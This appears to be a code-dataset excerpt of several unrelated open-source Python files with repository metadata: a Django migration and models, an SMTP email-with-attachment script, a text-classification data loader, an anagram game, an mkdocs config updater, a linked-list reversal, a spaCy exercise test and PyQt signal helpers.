[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-09-18 04:11
from __future__ import unicode_literals
import CareerTinder.listfield
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CareerTinder', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='hiree',
name='date_of_birth',
),
migrations.RemoveField(
model_name='hiree',
name='name',
),
migrations.AddField(
model_name='hiree',
name='college',
field=models.CharField(default='mit', max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='degree',
field=models.CharField(choices=[(b'BA', b"Bachelor's"), (b'MA', b"Master's"), (b'DO', b'Doctorate')], default='ba', max_length=10),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='first_name',
field=models.CharField(default='john', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='last_name',
field=models.CharField(default='doe', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='major',
field=models.CharField(default='cs', max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='year',
field=models.IntegerField(default='2019'),
preserve_default=False,
),
migrations.AddField(
model_name='recruiter',
name='hirees',
field=CareerTinder.listfield.ListField(default=b''),
),
migrations.AlterField(
model_name='company',
name='logo',
field=models.ImageField(upload_to=b'media/logos/'),
),
migrations.AlterField(
model_name='hiree',
name='face_picture',
field=models.ImageField(upload_to=b'media/faces/'),
),
migrations.AlterField(
model_name='hiree',
name='resume_picture',
field=models.FileField(upload_to=b'media/resumes/'),
),
]
| 30.728395 | 143 | 0.546002 |
a2d721ef72b39de52022137d721dac292cbddcad
| 890 |
py
|
Python
|
Python/Topics/Sending-Email/05-pdf-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Python/Topics/Sending-Email/05-pdf-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Python/Topics/Sending-Email/05-pdf-attachment.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
import smtplib
import os
from email.message import EmailMessage
EMAIL_ADDRESS = os.environ.get("GMAIL_ADDRESS")
EMAIL_PASSWORD = os.environ.get("GMAIL_APP_PASS")
pdfs = ["/home/shihab4t/Downloads/Profile.pdf"]
with smtplib.SMTP_SSL("smtp.gmail.com", 465) as smtp:
smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
    receiver = "[email protected]"
msg = EmailMessage()
msg["Subject"] = "Grab dinner this weekend? 2"
msg["From"] = EMAIL_ADDRESS
msg["To"] = reciver
msg.set_content("How about dinner at 6pm this Saturday")
    for pdf in pdfs:
        with open(pdf, "rb") as pdf_file:
            pdf_data = pdf_file.read()
            pdf_name = pdf_file.name
msg.add_attachment(pdf_data, maintype="application",
subtype="octet-stream", filename=pdf_name)
smtp.send_message(msg)
print(f"Email was sented to {reciver}")
| 26.969697 | 69 | 0.665169 |
3be1c8da8fb0704e33d69f4791863e002d5b116a
| 2,045 |
py
|
Python
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 5 |
2020-07-14T07:48:10.000Z
|
2021-12-20T21:20:10.000Z
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 7 |
2021-03-26T03:13:38.000Z
|
2022-03-12T00:42:03.000Z
|
examples/nowcoder/SQL3/models.py
|
zhengtong0898/django-decode
|
69680853a4a5b07f6a9c4b65c7d86b2d401a92b1
|
[
"MIT"
] | 1 |
2021-02-16T07:04:25.000Z
|
2021-02-16T07:04:25.000Z
|
from django.db import models
# 1. Django does not support composite primary keys.
# 2. Django does not support disabling the primary key:
#    if no field in the table defines a primary key,
#    Django automatically adds an `id` field and makes it the primary key.
#
#
# In general, when InnoDB creates a table without a primary key,
# it uses a unique key as the clustered index if one exists;
# if there is no unique key either, InnoDB creates a hidden
# primary key (the clustered index).
#
#
# Hence a CREATE TABLE statement like the one below cannot be reproduced
# one-to-one by a Django model:
# CREATE TABLE `salaries` (
# `emp_no` int(11) NOT NULL,
# `salary` int(11) NOT NULL,
# `from_date` date NOT NULL,
# `to_date` date NOT NULL,
# PRIMARY KEY (`emp_no`,`from_date`)
# );
class salaries(models.Model):
"""
    CREATE TABLE `SQL3_salaries` (
        `id` integer AUTO_INCREMENT NOT NULL PRIMARY KEY,
        `emp_no` integer NOT NULL,
        `salary` integer NOT NULL,
        `from_date` date NOT NULL,
        `to_date` date NOT NULL
    );
    ALTER TABLE `SQL3_salaries` ADD CONSTRAINT `uc_emp_no_from_date` UNIQUE (`emp_no`, `from_date`);
"""
emp_no = models.IntegerField(verbose_name="员工编号", null=False)
salary = models.IntegerField(verbose_name="薪资", null=False)
from_date = models.DateField(verbose_name="from_date", null=False)
to_date = models.DateField(verbose_name="to_date", null=False)
class Meta:
constraints = [models.UniqueConstraint(fields=['emp_no', 'from_date'], name="uc_emp_no_from_date"), ]
class dept_manager(models.Model):
"""
    CREATE TABLE `SQL3_dept_manager` (
        `id` integer AUTO_INCREMENT NOT NULL PRIMARY KEY,
        `dept_no` varchar(4) NOT NULL,
        `emp_no` integer NOT NULL,
        `to_date` date NOT NULL
    );
    ALTER TABLE `SQL3_dept_manager` ADD CONSTRAINT `uc_emp_no_dept_no` UNIQUE (`emp_no`, `dept_no`);
"""
dept_no = models.CharField(verbose_name="部门编号", max_length=4, null=False)
emp_no = models.IntegerField(verbose_name="员工编号", null=False)
to_date = models.DateField(verbose_name="to_date", null=False)
class Meta:
constraints = [models.UniqueConstraint(fields=['emp_no', 'dept_no'], name="uc_emp_no_dept_no"), ]
| 33.52459 | 109 | 0.684597 |
ce0dbcf0753017f4de48e972ead2feb9166619cc
| 6,373 |
py
|
Python
|
text_clf/data_load.py
|
kejunxiao/TextClf
|
aa1c195cb5908c32a3e6ed6891142603cb198d87
|
[
"BSD-3-Clause"
] | 2 |
2018-05-13T13:00:10.000Z
|
2018-05-13T13:00:12.000Z
|
text_clf/data_load.py
|
kejunxiao/TextClf
|
aa1c195cb5908c32a3e6ed6891142603cb198d87
|
[
"BSD-3-Clause"
] | null | null | null |
text_clf/data_load.py
|
kejunxiao/TextClf
|
aa1c195cb5908c32a3e6ed6891142603cb198d87
|
[
"BSD-3-Clause"
] | null | null | null |
"""
data preprocessing and get batch
"""
import os
import re
import logging
import itertools
from collections import Counter
import numpy as np
import pandas as pd
class DataLoad(object):
logging.getLogger().setLevel(logging.INFO)
def __init__(self, data_path, batch_size, num_epochs, dev_sample_rate, forced_seq_len=None):
"""
params:
data_path: source data path
mode: 'tarin' or 'dev'
dev_sample_rate: percentage of the training data to use for validation
"""
self.data_path = data_path
self.batch_size = batch_size
self.num_epochs = num_epochs
self.forced_seq_len = forced_seq_len
self.dev_sample_rate = dev_sample_rate
self._load_data()
def train_batch_iter(self, shuffle=True):
"""
params:
returns:
"""
x, y, data_size = self._split_train_dev('train')
num_batchs_per_epoch = data_size // self.batch_size + 1
for _ in range(self.num_epochs):
if shuffle:
shuffled_indices = np.random.permutation(np.arange(data_size))
x, y = x[shuffled_indices], y[shuffled_indices]
for i in range(num_batchs_per_epoch):
start_idx = i * self.batch_size
end_idx = min((i+1) * self.batch_size, data_size)
yield x[start_idx:end_idx], y[start_idx:end_idx]
def get_dev_data(self, shuffle=True):
"""
params:
returns:
"""
dev_x, dev_y, dev_size = self._split_train_dev('dev')
if shuffle:
shuffled_indices = np.random.permutation(np.arange(dev_size))
dev_x, dev_y = dev_x[shuffled_indices], dev_y[shuffled_indices]
return dev_x, dev_y
@staticmethod
def _clean_str(s):
s = re.sub(r"[^A-Za-z0-9:(),!?\'\`]", " ", s)
s = re.sub(r" : ", ":", s)
s = re.sub(r"\'s", " \'s", s)
s = re.sub(r"\'ve", " \'ve", s)
s = re.sub(r"n\'t", " n\'t", s)
s = re.sub(r"\'re", " \'re", s)
s = re.sub(r"\'d", " \'d", s)
s = re.sub(r"\'ll", " \'ll", s)
s = re.sub(r",", " , ", s)
s = re.sub(r"!", " ! ", s)
s = re.sub(r"\(", " \( ", s)
s = re.sub(r"\)", " \) ", s)
s = re.sub(r"\?", " \? ", s)
s = re.sub(r"\s{2,}", " ", s)
return s.strip().lower()
def _load_data(self):
"""
params:
returns:
x: 2D np.array
samples, dimension is (N, self.forced_seq_len)
y: 2D np.array
labels, dimension is (N, len(labels))
token2id: python dict object
id2token: python dict object
df: pd.DataFrame
labels: 1D np.array
"""
df = pd.read_csv(self.data_path)
selected_cols = ['Descript', 'Category']
df = df.loc[:, selected_cols].dropna(axis=0, how='any')
# construct label one-hot vectors
labels = np.unique(
np.array(df.loc[:, selected_cols[1]], dtype=np.object))
one_hot = np.zeros([len(labels), len(labels)], np.float)
np.fill_diagonal(one_hot, 1)
# {laebl: one hot vector for this label}
labels2vec = dict(zip(labels, one_hot))
raw_x = np.array(df.loc[:, selected_cols[0]].apply(
lambda x: DataLoad._clean_str(x).split(' ')), dtype=np.object)
raw_y = df.loc[:, selected_cols[1]].apply(
lambda y: labels2vec[y]).tolist()
# padding sentence
padded_x = self._pad_sentence(raw_x)
token2id = self._build_vocab(padded_x)
x = []
for sent in padded_x:
xs = []
for token in sent:
if token not in token2id:
token = '<OOV>'
xs.append(token2id[token])
x.append(xs)
self.x = np.array(x, dtype=np.int64)
self.y = np.array(raw_y, dtype=np.float)
def _split_train_dev(self, mode):
# split data into train set or dev set
data_size = self.x.shape[0]
dev_size = int(data_size * self.dev_sample_rate)
train_size = data_size - dev_size
# maybe using cross-validation is better
if mode == 'train':
return self.x[:train_size], self.y[:train_size], train_size
        elif mode == 'dev':
            # dev set is the tail of the data, disjoint from the train set
            return self.x[train_size:], self.y[train_size:], dev_size
        else:
            raise ValueError('mode should be train or dev.')
def _pad_sentence(self, sentences, padding_word='<PAD>'):
if self.forced_seq_len is None:
# forced_seq_len = max length of all sentences
self.forced_seq_len = max([len(sent) for sent in sentences])
padded_sentences = []
for sent in sentences:
if len(sent) < self.forced_seq_len:
sent.extend([padding_word] * (self.forced_seq_len-len(sent)))
padded_sent = sent
elif len(sent) > self.forced_seq_len:
                logging.info('Sentence is longer than forced_seq_len, '
                             'so it will be truncated.')
padded_sent = sent[:self.forced_seq_len]
padded_sentences.append(padded_sent)
return padded_sentences
def _build_vocab(self, sentences):
tokens_count = Counter(itertools.chain(*sentences))
vocab = [token[0]
for token in tokens_count.most_common(self.forced_seq_len)]
vocab += ['<OOV>'] # out of vocablary
token2id = {token: i for i, token in enumerate(vocab)}
self.vocab_size = len(vocab)
return token2id
if __name__ == '__main__':
params = {
'data_path': '../dataset/San_Francisco_Crime/train.csv.zip',
'batch_size': 32,
'num_epochs': 200,
'forced_seq_len': 14,
'dev_sample_rate':0.05
}
data = DataLoad(data_path=params['data_path'],
batch_size=params['batch_size'],
num_epochs=params['num_epochs'],
forced_seq_len=params['forced_seq_len'],
dev_sample_rate=params['dev_sample_rate'])
batches = data.train_batch_iter()
batch_x, batch_y = next(batches)
# print(len(batches))
print(batch_x.shape)
print(batch_y.shape)
| 35.209945 | 100 | 0.557822 |
ce3501af1f45e1223934bba47fc0e9a49f9b32bd
| 1,669 |
py
|
Python
|
BITs/2014/Kozlov_A_D/task_8_11.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
BITs/2014/Kozlov_A_D/task_8_11.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
BITs/2014/Kozlov_A_D/task_8_11.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Task 8. Variant 11.
# 1-50. Extend the "Anagrams" game (see M. Dawson, Python Programming for the Absolute Beginner, ch. 4) so that each word comes with a hint. The player earns the right to a hint when they have no guesses. Design a scoring system in which players who guess the word without a hint earn more points than those who asked for one.
# Kozlov A.D.
# 04.04.2016
import random
words = ("питон","анаграмма","простая","сложная","ответ","подстаканник")
word=random.choice(words)
correct=word
score=10;
i=0
jumble=""
while word:
position=random.randrange(len(word))
jumble+=word[position]
word=word[:position]+word[(position+1):]
print("""
Добро пожаловать в игру 'Анаграммы'!
Надо переставить буквы так, чтобы получилось осмысленное слово.
Для вызова подсказки напишите: подсказка.
(Для выхода нажмите Enter, не вводя своей версии.)
""")
print("Вот анаграмма: ", jumble)
guess=input("Попробуйте отгадать исходное слово: ")
if guess=="подсказка":
score-=1
print(str(i+1),"буква: ",correct[i])
i+=1
while guess !=correct and guess!="":
guess=input("Попробуйте отгадать исходное слово: ")
if guess=="подсказка":
if i==len(correct):
print("Все буквы уже выведены.")
continue
score-=1
print(str(i+1),"буква: ",correct[i])
i+=1
continue
if guess==correct:
print("Да. Именно так! Вы отгадали! Вы зарабботали ",score," очков!")
else:
print("К сожалению, Вы неправы.")
print("Спасибо за игру.")
input("\n\nНажмите Enter, чтобы выйти")
| 37.088889 | 362 | 0.656681 |
cbf60a5f54499551d07c8764354e2a5053355b82
| 899 |
py
|
Python
|
buildencyclopedia.py
|
ZhenyuZ/gdc-docs
|
f024d5d4cd86dfa2c9e7d63850eee94d975b7948
|
[
"Apache-2.0"
] | 67 |
2016-06-09T14:11:51.000Z
|
2022-03-16T07:54:44.000Z
|
buildencyclopedia.py
|
ZhenyuZ/gdc-docs
|
f024d5d4cd86dfa2c9e7d63850eee94d975b7948
|
[
"Apache-2.0"
] | 19 |
2016-06-21T15:51:11.000Z
|
2021-06-07T09:22:20.000Z
|
buildencyclopedia.py
|
ZhenyuZ/gdc-docs
|
f024d5d4cd86dfa2c9e7d63850eee94d975b7948
|
[
"Apache-2.0"
] | 32 |
2016-07-15T01:24:19.000Z
|
2019-03-25T10:42:28.000Z
|
"""updates the encyclopedia section in the mkdocs.yml
should be run whenever a file is removed or added into the directory"""
import os
import yaml
ABSFILEPATH = os.path.dirname(os.path.realpath(__file__))
FILEARRAY = os.listdir(ABSFILEPATH + '/docs/Encyclopedia/pages')
FILEARRAY = sorted(FILEARRAY, key=str.lower)
with open(ABSFILEPATH + '/mkdocs.yml', 'r') as f:
    doc = yaml.safe_load(f)
encycdict = next(d for (index, d) in enumerate(doc['pages']) \
if d.get('EncyclopediaEntries', False) != False)
newlist = []
for filename in FILEARRAY:
    if filename.endswith(".md"):
        tempdict = {filename[:-3].replace("_", " "): "".join(['Encyclopedia/pages/', filename[:-3], '.md'])}
        newlist.append(tempdict)
encycdict['EncyclopediaEntries'] = newlist
with open(ABSFILEPATH + '/mkdocs.yml', 'w+') as f:
f.write(yaml.dump(doc, default_flow_style=False))
| 32.107143 | 114 | 0.670745 |
ce943e66efc0e44702391aac0684e3625f5526e9
| 718 |
py
|
Python
|
ds/practice/daily_practice/20-07/assets/code/reverse_sll.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
ds/practice/daily_practice/20-07/assets/code/reverse_sll.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | 8 |
2020-03-24T17:47:23.000Z
|
2022-03-12T00:33:21.000Z
|
ds/practice/daily_practice/20-07/assets/code/reverse_sll.py
|
tobias-fyi/vela
|
b0b3d3c6dc3fa397c8c7a492098a02cf75e0ff82
|
[
"MIT"
] | null | null | null |
"""
HackerRank :: Reverse a singly-linked list
https://www.hackerrank.com/challenges/reverse-a-linked-list/problem
Complete the reverse function below.
For your reference:
SinglyLinkedListNode:
int data
SinglyLinkedListNode next
"""
def reverse(head):
# head node value can be null
# Keep track of previous node
prev_node = None
cur_node = head
# Loop through - while node.next
while cur_node:
# Save node for overwriting cur_node
next_node = cur_node.next
# Set current node's next to prev_node
cur_node.next = prev_node
# Pass previous node to next iteration
prev_node = cur_node
cur_node = next_node
return prev_node
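if __name__ == "__main__":
    # Illustrative harness (an addition; HackerRank supplies its own node type):
    class SinglyLinkedListNode:
        def __init__(self, data):
            self.data = data
            self.next = None
    head = SinglyLinkedListNode(1)
    head.next = SinglyLinkedListNode(2)
    head.next.next = SinglyLinkedListNode(3)
    node = reverse(head)
    while node:
        print(node.data)  # prints 3, 2, 1
        node = node.next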
| 23.16129 | 67 | 0.683844 |
ceadbfc8ec08afd61feb6385ed4d339e585d1115
| 538 |
py
|
Python
|
exercises/de/test_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/de/test_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/de/test_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
def test():
assert "spacy.load" in __solution__, "Rufst du spacy.load auf?"
assert nlp.meta["lang"] == "de", "Lädst du das korrekte Modell?"
assert nlp.meta["name"] == "core_news_sm", "Lädst du das korrekte Modell?"
assert "nlp(text)" in __solution__, "Verarbeitest du den Text korrekt?"
assert "print(doc.text)" in __solution__, "Druckst du den Text des Doc?"
__msg__.good(
"Gut gemacht! Jetzt wo du das Laden von Modellen geübt hast, lass uns "
"mal ein paar ihrer Vorhersagen anschauen."
)
| 44.833333 | 79 | 0.669145 |
f0339846cad63a7692947f289af6990dc4271899
| 3,987 |
py
|
Python
|
easyp2p/p2p_signals.py
|
Ceystyle/easyp2p
|
99c32e3ec0ff5a34733f157dd1b53d1aa9bc9edc
|
[
"MIT"
] | 4 |
2019-07-18T10:58:28.000Z
|
2021-11-18T16:57:45.000Z
|
easyp2p/p2p_signals.py
|
Ceystyle/easyp2p
|
99c32e3ec0ff5a34733f157dd1b53d1aa9bc9edc
|
[
"MIT"
] | 1 |
2019-07-05T09:21:47.000Z
|
2019-07-05T09:21:47.000Z
|
easyp2p/p2p_signals.py
|
Ceystyle/easyp2p
|
99c32e3ec0ff5a34733f157dd1b53d1aa9bc9edc
|
[
"MIT"
] | 2 |
2019-07-05T08:56:34.000Z
|
2020-06-09T10:03:42.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Niko Sandschneider
"""Module implementing Signals for communicating with the GUI."""
from functools import wraps
import logging
from PyQt5.QtCore import QObject, pyqtSignal
class Signals(QObject):
"""Class for signal communication between worker classes and GUI."""
update_progress_bar = pyqtSignal()
add_progress_text = pyqtSignal(str, bool)
abort_signal = pyqtSignal()
get_credentials = pyqtSignal(str)
send_credentials = pyqtSignal(str, str)
def __init__(self):
super().__init__()
self.abort = False
self.abort_signal.connect(self.abort_evaluation)
self.connected = False
self.logger = logging.getLogger('easyp2p.p2p_signals.Signals')
self.logger.debug('Created Signals instance.')
def update_progress(self, func):
"""Decorator for updating progress text and progress bar."""
@wraps(func)
def wrapper(*args, **kwargs):
try:
if self.abort:
raise RuntimeError('Abort by user')
result = func(*args, **kwargs)
except RuntimeError as err:
self.logger.exception('RuntimeError in update_progress')
self.add_progress_text.emit(str(err), True)
raise PlatformFailedError from err
except RuntimeWarning as err:
self.logger.warning(
'RuntimeWarning in update_progress', exc_info=True)
self.add_progress_text.emit(str(err), True)
result = None
finally:
self.update_progress_bar.emit()
return result
return wrapper
def watch_errors(self, func):
"""Decorator for emitting error messages to the progress window."""
@wraps(func)
def wrapper(*args, **kwargs):
try:
result = func(*args, **kwargs)
except RuntimeError as err:
self.logger.exception('RuntimeError in watch_errors.')
self.add_progress_text.emit(str(err), True)
raise PlatformFailedError from err
except RuntimeWarning as err:
self.logger.warning(str(err))
self.add_progress_text.emit(str(err), True)
result = None
return result
return wrapper
def connect_signals(self, other: 'Signals') -> None:
"""
Helper method for connecting signals of different classes.
Args:
other: Signals instance of another class.
"""
self.logger.debug('Connecting signals.')
self.update_progress_bar.connect(other.update_progress_bar)
self.add_progress_text.connect(other.add_progress_text)
self.get_credentials.connect(other.get_credentials)
other.send_credentials.connect(self.send_credentials)
self.connected = True
self.logger.debug('Connecting signals successful.')
def disconnect_signals(self) -> None:
"""
Disconnect signals. Ignore error if they were not connected or if
disconnecting fails.
"""
if not self.connected:
return
self.logger.debug('Disconnecting signals.')
for signal in [
self.add_progress_text, self.get_credentials,
self.update_progress_bar]:
try:
signal.disconnect()
except TypeError:
self.logger.exception(
'Disconnecting signal %s failed.', str(signal))
else:
self.logger.debug('Signal %s disconnected.', str(signal))
self.connected = False
def abort_evaluation(self):
"""Set the abort flag to True."""
self.logger.debug('Aborting evaluation.')
self.abort = True
class PlatformFailedError(Exception):
"""Will be raised if evaluation of a P2P platform fails."""
| 34.37069 | 75 | 0.605719 |